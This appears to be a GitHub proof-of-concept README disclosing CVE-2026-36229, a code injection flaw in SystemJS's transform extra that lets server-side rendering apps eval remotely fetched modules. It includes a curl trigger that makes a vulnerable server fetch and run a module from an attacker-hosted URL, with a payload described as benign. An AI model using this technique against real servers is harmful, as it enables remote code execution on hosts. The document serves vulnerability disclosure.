NullByte8080/CVE-2026-36229

# CVE-2026-36229: SystemJS Transform Extra Server-Side Rendering Code Injection ## Vulnerability Summary - **CVE ID:** CVE-2026-36229 - **Vendor:** SystemJS Open Source Project - **Product:** SystemJS - **Affected Component:** `dist/extras/transform.js` (Transform Extra Module) - **Vulnerability Type:** Improper Control of Generation of Code / Code Injection (CWE-94) - **Impact:** Remote Code Execution (RCE) / Security Bypass ## Description A Code Injection vulnerability exists in SystemJS when deployed within a Server-Side Rendering (SSR) backend architecture where the `transform` extra (`dist/extras/transform.js`) is actively enabled. When the backend SSR application accepts an untrusted, user-supplied component URL and imports it dynamically via SystemJS, the transform engine fetches the remote resource. If the target resource is evaluated as a non-WASM module, the engine executes the code content using an un-sandboxed `eval()` block. A remote attacker can pass a malicious, self-hosted JavaScript module URL to the application's rendering endpoints, allowing arbitrary system-level commands to execute directly inside the host's Node.js process context. ## Technical Analysis & Attack Scenario The vulnerability relies on a combination of specific configuration parameters: 1. An input parameter allows an external client to specify a module or component path for server-side processing. 2. SystemJS is instructed to handle the import while relying on the `transform.js` extension. 3. Because the extension relies on global string evaluation primitives to convert source modules dynamically, the execution flow seamlessly shifts control to the code contained within the fetched third-party asset. ## Local Reproduction & Proof of Concept (PoC) ### Repository Architecture * `vulnerable-ssr-server.cjs` - The target Node.js SSR application that accepts and processes a user-controlled component string. * `attacker-server.cjs` - A loopback server mimicking an external actor, configured to host and deliver the benign payload block. ### Environment Setup To initialize the testing landscape, open your environment terminals and complete the following sequence: ## Run Install dependencies: npm install Terminal 1: npm run attacker Terminal 2: npm run ssr Trigger from another terminal: curl 'http://127.0.0.1:8080/render?component=http://127.0.0.1:9001/payload.js?run=1' Expected proof: /tmp/pwned /tmp/pwned/systemjs-ssr-rce.txt Use a fresh run= value for repeated tests after deleting the proof directory; SystemJS caches imported modules by URL. The payload is intentionally benign. It creates /tmp/pwned, writes a proof file, and exports a `render()` function so the SSR page still completes.

标签：自定义脚本